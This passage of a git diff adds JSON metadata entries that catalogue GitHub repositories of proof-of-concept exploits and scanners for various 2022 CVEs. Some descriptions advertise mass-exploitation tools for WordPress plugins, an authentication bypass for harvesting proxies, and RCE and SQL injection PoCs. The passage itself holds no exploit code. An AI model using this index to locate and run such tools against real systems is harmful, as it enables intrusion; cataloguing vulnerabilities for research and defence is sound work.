false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39959.json b/2022/CVE-2022-39959.json new file mode 100644 index 0000000000..b6a181b5fe --- /dev/null +++ b/2022/CVE-2022-39959.json @@ -0,0 +1,38 @@ +[ + { + "id": 545030714, + "name": "CVE-2022-39959", + "full_name": "usmarine2141\/CVE-2022-39959", + "owner": { + "login": "usmarine2141", + "id": 20714147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20714147?v=4", + "html_url": "https:\/\/github.com\/usmarine2141", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/usmarine2141\/CVE-2022-39959", + "description": "CVE-2022-39959", + "fork": false, + "created_at": "2022-10-03T16:59:06Z", + "updated_at": "2022-10-08T01:03:42Z", + "pushed_at": "2022-10-07T06:27:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploits", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39986.json b/2022/CVE-2022-39986.json new file mode 100644 index 0000000000..9eedf9ec05 --- /dev/null +++ b/2022/CVE-2022-39986.json @@ -0,0 +1,64 @@ +[ + { + "id": 682662263, + "name": "CVE-2022-39986", + "full_name": "mind2hex\/CVE-2022-39986", + "owner": { + "login": "mind2hex", + "id": 51345640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51345640?v=4", + "html_url": "https:\/\/github.com\/mind2hex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mind2hex\/CVE-2022-39986", + "description": "bash script for automated discovery and exploitation of machines with the CVE-2022-39986 vulnerability", + "fork": false, + "created_at": "2023-08-24T16:48:27Z", + "updated_at": "2024-03-28T19:44:25Z", + "pushed_at": "2023-11-28T19:59:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683905565, + "name": "RaspAP-CVE-2022-39986-PoC", + "full_name": "tucommenceapousser\/RaspAP-CVE-2022-39986-PoC", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/RaspAP-CVE-2022-39986-PoC", + "description": "CVE-2022-39986 PoC", + "fork": false, + "created_at": "2023-08-28T03:13:10Z", + "updated_at": "2023-12-29T10:06:48Z", + "pushed_at": "2023-08-16T11:32:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39987.json b/2022/CVE-2022-39987.json new file mode 100644 index 0000000000..20eb62b85d --- /dev/null +++ b/2022/CVE-2022-39987.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209776, + "name": "CVE-2022-39987-2", + "full_name": "miguelc49\/CVE-2022-39987-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-39987-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:17Z", + "updated_at": "2024-04-14T17:39:14Z", + "pushed_at": "2024-04-14T17:39:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209800, + "name": "CVE-2022-39987-1", + "full_name": "miguelc49\/CVE-2022-39987-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-39987-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:22Z", + "updated_at": "2024-04-14T17:39:10Z", + "pushed_at": "2024-04-14T17:39:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209822, + "name": "CVE-2022-39987-3", + "full_name": "miguelc49\/CVE-2022-39987-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-39987-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:27Z", + "updated_at": "2024-04-14T17:39:19Z", + "pushed_at": "2024-04-14T17:39:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40032.json b/2022/CVE-2022-40032.json new file mode 100644 index 0000000000..0561290654 --- /dev/null +++ b/2022/CVE-2022-40032.json @@ -0,0 +1,33 @@ +[ + { + "id": 602335571, + "name": "CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "full_name": "h4md153v63n\/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "owner": { + "login": "h4md153v63n", + "id": 5091265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5091265?v=4", + "html_url": "https:\/\/github.com\/h4md153v63n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4md153v63n\/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "description": "CVE-2022-40032: Simple Task Managing System - 'login' and 'password' SQL Injection (Unauthenticated)", + "fork": false, + "created_at": "2023-02-16T01:42:48Z", + "updated_at": "2024-05-03T10:38:29Z", + "pushed_at": "2023-12-25T19:09:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40126.json b/2022/CVE-2022-40126.json new file mode 100644 index 0000000000..e2a405d48e --- /dev/null +++ b/2022/CVE-2022-40126.json @@ -0,0 +1,33 @@ +[ + { + "id": 543153174, + "name": "CVE-2022-40126", + "full_name": "LovelyWei\/CVE-2022-40126", + "owner": { + "login": "LovelyWei", + "id": 16489620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16489620?v=4", + "html_url": "https:\/\/github.com\/LovelyWei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LovelyWei\/CVE-2022-40126", + "description": "Don't be evil.", + "fork": false, + "created_at": "2022-09-29T13:59:44Z", + "updated_at": "2022-09-30T05:49:04Z", + "pushed_at": "2022-09-29T14:01:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40127.json b/2022/CVE-2022-40127.json new file mode 100644 index 0000000000..1c5f8404e2 --- /dev/null +++ b/2022/CVE-2022-40127.json @@ -0,0 +1,69 @@ +[ + { + "id": 567740887, + "name": "CVE-2022-40127", + "full_name": "Mr-xn\/CVE-2022-40127", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-40127", + "description": "Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC", + "fork": false, + "created_at": "2022-11-18T13:19:23Z", + "updated_at": "2024-02-27T08:16:56Z", + "pushed_at": "2022-11-19T10:35:50Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-airflow", + "cve", + "poc", + "rce" + ], + "visibility": "public", + "forks": 6, + "watchers": 40, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 669143228, + "name": "CVE-2022-40127-Airflow-RCE", + "full_name": "jakabakos\/CVE-2022-40127-Airflow-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2022-40127-Airflow-RCE", + "description": "CVE-2022-40127 PoC and exploit", + "fork": false, + "created_at": "2023-07-21T12:55:16Z", + "updated_at": "2024-06-06T11:58:59Z", + "pushed_at": "2023-08-03T11:10:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40140.json b/2022/CVE-2022-40140.json new file mode 100644 index 0000000000..610d131170 --- /dev/null +++ b/2022/CVE-2022-40140.json @@ -0,0 +1,95 @@ +[ + { + "id": 544338779, + "name": "NotProxyShellHunter", + "full_name": "mr-r3b00t\/NotProxyShellHunter", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/NotProxyShellHunter", + "description": "Check for NotProxyShell CVE-2022-40140 & CVE-2022-41082", + "fork": false, + "created_at": "2022-10-02T08:14:03Z", + "updated_at": "2024-08-12T20:27:29Z", + "pushed_at": "2022-10-02T12:16:47Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 547154027, + "name": "NotProxyShellScanner", + "full_name": "ZephrFish\/NotProxyShellScanner", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/NotProxyShellScanner", + "description": "Python implementation for NotProxyShell aka CVE-2022-40140 & CVE-2022-41082", + "fork": false, + "created_at": "2022-10-07T08:10:00Z", + "updated_at": "2024-08-12T20:27:36Z", + "pushed_at": "2024-05-21T10:10:10Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 564844236, + "name": "CVE-2022-40140-SCANNER", + "full_name": "ipsBruno\/CVE-2022-40140-SCANNER", + "owner": { + "login": "ipsBruno", + "id": 6839604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6839604?v=4", + "html_url": "https:\/\/github.com\/ipsBruno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipsBruno\/CVE-2022-40140-SCANNER", + "description": "A Shodan hunter for CVE-2022-40140 ", + "fork": false, + "created_at": "2022-11-11T16:25:29Z", + "updated_at": "2024-08-12T20:28:18Z", + "pushed_at": "2022-11-13T23:27:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40146.json b/2022/CVE-2022-40146.json new file mode 100644 index 0000000000..a472a96987 --- /dev/null +++ b/2022/CVE-2022-40146.json @@ -0,0 +1,64 @@ +[ + { + "id": 560247956, + "name": "CVE-2022-40146_Exploit_Jar", + "full_name": "cckuailong\/CVE-2022-40146_Exploit_Jar", + "owner": { + "login": "cckuailong", + "id": 10824150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4", + "html_url": "https:\/\/github.com\/cckuailong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cckuailong\/CVE-2022-40146_Exploit_Jar", + "description": null, + "fork": false, + "created_at": "2022-11-01T03:41:36Z", + "updated_at": "2024-09-25T03:02:24Z", + "pushed_at": "2022-11-01T05:25:52Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 835802970, + "name": "CVE-2022-40146", + "full_name": "soulfoodisgood\/CVE-2022-40146", + "owner": { + "login": "soulfoodisgood", + "id": 64322368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64322368?v=4", + "html_url": "https:\/\/github.com\/soulfoodisgood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soulfoodisgood\/CVE-2022-40146", + "description": "Vulnerable svg-to-png service", + "fork": false, + "created_at": "2024-07-30T15:00:00Z", + "updated_at": "2024-07-30T15:07:08Z", + "pushed_at": "2024-07-30T15:07:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40297.json b/2022/CVE-2022-40297.json new file mode 100644 index 0000000000..0206971979 --- /dev/null +++ b/2022/CVE-2022-40297.json @@ -0,0 +1,53 @@ +[ + { + "id": 532543106, + "name": "PoC-ubuntutouch-pin-privesc", + "full_name": "filipkarc\/PoC-ubuntutouch-pin-privesc", + "owner": { + "login": "filipkarc", + "id": 111286209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111286209?v=4", + "html_url": "https:\/\/github.com\/filipkarc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/filipkarc\/PoC-ubuntutouch-pin-privesc", + "description": "CVE-2022-40297 - Proof of Concept: Privilege escalation in Ubuntu Touch 16.04 - by PIN Bruteforce", + "fork": false, + "created_at": "2022-09-04T13:05:58Z", + "updated_at": "2024-02-24T11:42:43Z", + "pushed_at": "2022-09-15T09:34:35Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "brute-force", + "bruteforce", + "bugbountytips", + "bugbountytricks", + "cve", + "exploit", + "hacking", + "linux", + "linuxphone", + "malware", + "mobile", + "mobile-hacking", + "mobilehacking", + "pentesting", + "privesc", + "ubuntu", + "ubuntutouch", + "vulnerability", + "vulnerability-assessment" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40317.json b/2022/CVE-2022-40317.json new file mode 100644 index 0000000000..a3fef4fa10 --- /dev/null +++ b/2022/CVE-2022-40317.json @@ -0,0 +1,33 @@ +[ + { + "id": 534698979, + "name": "CVE-2022-40317", + "full_name": "izdiwho\/CVE-2022-40317", + "owner": { + "login": "izdiwho", + "id": 5587598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5587598?v=4", + "html_url": "https:\/\/github.com\/izdiwho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/izdiwho\/CVE-2022-40317", + "description": null, + "fork": false, + "created_at": "2022-09-09T15:27:12Z", + "updated_at": "2023-08-05T08:20:06Z", + "pushed_at": "2022-09-10T03:08:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40347.json b/2022/CVE-2022-40347.json new file mode 100644 index 0000000000..d66d5ed00d --- /dev/null +++ b/2022/CVE-2022-40347.json @@ -0,0 +1,33 @@ +[ + { + "id": 602344088, + "name": "CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "full_name": "h4md153v63n\/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "owner": { + "login": "h4md153v63n", + "id": 5091265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5091265?v=4", + "html_url": "https:\/\/github.com\/h4md153v63n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4md153v63n\/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "description": "CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)", + "fork": false, + "created_at": "2023-02-16T02:16:51Z", + "updated_at": "2024-05-03T10:38:31Z", + "pushed_at": "2023-12-25T19:02:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40348.json b/2022/CVE-2022-40348.json new file mode 100644 index 0000000000..59b4570b5e --- /dev/null +++ b/2022/CVE-2022-40348.json @@ -0,0 +1,33 @@ +[ + { + "id": 602347294, + "name": "CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated", + "full_name": "h4md153v63n\/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated", + "owner": { + "login": "h4md153v63n", + "id": 5091265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5091265?v=4", + "html_url": "https:\/\/github.com\/h4md153v63n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4md153v63n\/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated", + "description": "CVE-2022-40348: Intern Record System - 'name' and 'email' Cross-site Scripting (Unauthenticated)", + "fork": false, + "created_at": "2023-02-16T02:29:33Z", + "updated_at": "2024-05-03T10:38:30Z", + "pushed_at": "2023-12-25T19:07:44Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40363.json b/2022/CVE-2022-40363.json new file mode 100644 index 0000000000..3c90ebe86f --- /dev/null +++ b/2022/CVE-2022-40363.json @@ -0,0 +1,33 @@ +[ + { + "id": 590734045, + "name": "CVE-2022-40363", + "full_name": "Olafdaf\/CVE-2022-40363", + "owner": { + "login": "Olafdaf", + "id": 123042506, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123042506?v=4", + "html_url": "https:\/\/github.com\/Olafdaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Olafdaf\/CVE-2022-40363", + "description": "A buffer overflow in the component nfc_device_load_mifare_ul_data of Flipper Devices Inc., Flipper Zero before v0.65.2 allows attackers to cause a Denial of Service (DoS) via a crafted NFC file. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-19T04:19:42Z", + "updated_at": "2023-12-05T04:28:03Z", + "pushed_at": "2022-12-29T11:12:27Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4047.json b/2022/CVE-2022-4047.json new file mode 100644 index 0000000000..832bbc062c --- /dev/null +++ b/2022/CVE-2022-4047.json @@ -0,0 +1,75 @@ +[ + { + "id": 696655758, + "name": "WooRefer", + "full_name": "im-hanzou\/WooRefer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/WooRefer", + "description": "Automatic Mass Tool for check and exploiting vulnerability in CVE-2022-4047 - Return Refund and Exchange For WooCommerce < 4.0.9 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2023-09-26T07:23:44Z", + "updated_at": "2023-09-26T20:15:02Z", + "pushed_at": "2023-09-27T17:59:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "bash", + "cve-2022-4047", + "exploit", + "mass-upload", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 731486666, + "name": "CVE-2022-4047", + "full_name": "entroychang\/CVE-2022-4047", + "owner": { + "login": "entroychang", + "id": 56551382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56551382?v=4", + "html_url": "https:\/\/github.com\/entroychang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/entroychang\/CVE-2022-4047", + "description": "CVE-2022-4047 poc", + "fork": false, + "created_at": "2023-12-14T07:36:01Z", + "updated_at": "2024-03-11T01:47:14Z", + "pushed_at": "2023-12-15T10:13:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "python3" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40470.json b/2022/CVE-2022-40470.json new file mode 100644 index 0000000000..96f4d501ed --- /dev/null +++ b/2022/CVE-2022-40470.json @@ -0,0 +1,33 @@ +[ + { + "id": 560275929, + "name": "CVE-2022-40470", + "full_name": "RashidKhanPathan\/CVE-2022-40470", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-40470", + "description": "Cross Site Scripting in Blood Donor Management System Using CodeIgniter - 1.0", + "fork": false, + "created_at": "2022-11-01T05:36:20Z", + "updated_at": "2024-12-19T15:23:32Z", + "pushed_at": "2022-11-01T05:37:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40471.json b/2022/CVE-2022-40471.json new file mode 100644 index 0000000000..f652292646 --- /dev/null +++ b/2022/CVE-2022-40471.json @@ -0,0 +1,43 @@ +[ + { + "id": 550513650, + "name": "CVE-2022-40471", + "full_name": "RashidKhanPathan\/CVE-2022-40471", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-40471", + "description": "RCE Exploit and Research ", + "fork": false, + "created_at": "2022-10-12T22:33:31Z", + "updated_at": "2024-12-19T15:23:35Z", + "pushed_at": "2022-10-15T06:42:44Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "bug-hunting", + "cve-2022-40471", + "exploit", + "exploit-development", + "penetration-testing", + "python", + "security-research", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40490.json b/2022/CVE-2022-40490.json new file mode 100644 index 0000000000..6b6755cfbf --- /dev/null +++ b/2022/CVE-2022-40490.json @@ -0,0 +1,33 @@ +[ + { + "id": 542635261, + "name": "CVE-2022-40490", + "full_name": "whitej3rry\/CVE-2022-40490", + "owner": { + "login": "whitej3rry", + "id": 60222364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60222364?v=4", + "html_url": "https:\/\/github.com\/whitej3rry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whitej3rry\/CVE-2022-40490", + "description": "Tiny File Manager v2.4.7 and below are vulnerable to Cross Site Scripting", + "fork": false, + "created_at": "2022-09-28T14:32:41Z", + "updated_at": "2022-09-29T08:15:51Z", + "pushed_at": "2022-09-28T14:37:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40494.json b/2022/CVE-2022-40494.json new file mode 100644 index 0000000000..687a653bda --- /dev/null +++ b/2022/CVE-2022-40494.json @@ -0,0 +1,41 @@ +[ + { + "id": 521183424, + "name": "nps-auth-bypass", + "full_name": "carr0t2\/nps-auth-bypass", + "owner": { + "login": "carr0t2", + "id": 62796978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62796978?v=4", + "html_url": "https:\/\/github.com\/carr0t2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carr0t2\/nps-auth-bypass", + "description": "nps认证绕过利用工具,CVE-2022-40494,使用此工具可在浏览器访问web控制端后台页面,或者批量获取socks5和http代理", + "fork": false, + "created_at": "2022-08-04T08:22:41Z", + "updated_at": "2025-01-07T00:57:14Z", + "pushed_at": "2022-08-19T09:04:09Z", + "stargazers_count": 301, + "watchers_count": 301, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bypass", + "cve", + "exp", + "fofa", + "nps", + "poc", + "proxy" + ], + "visibility": "public", + "forks": 39, + "watchers": 301, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4060.json b/2022/CVE-2022-4060.json new file mode 100644 index 0000000000..55360860ff --- /dev/null +++ b/2022/CVE-2022-4060.json @@ -0,0 +1,43 @@ +[ + { + "id": 692230555, + "name": "UPGer", + "full_name": "im-hanzou\/UPGer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/UPGer", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-4060 - WordPress Plugin : User Post Gallery <= 2.19 - Unauthenticated RCE", + "fork": false, + "created_at": "2023-09-15T21:38:47Z", + "updated_at": "2024-11-21T14:53:58Z", + "pushed_at": "2023-09-16T21:55:56Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "bash", + "check", + "cve-2022-4060", + "exploit", + "vulnerability", + "vulnerability-scanners", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4061.json 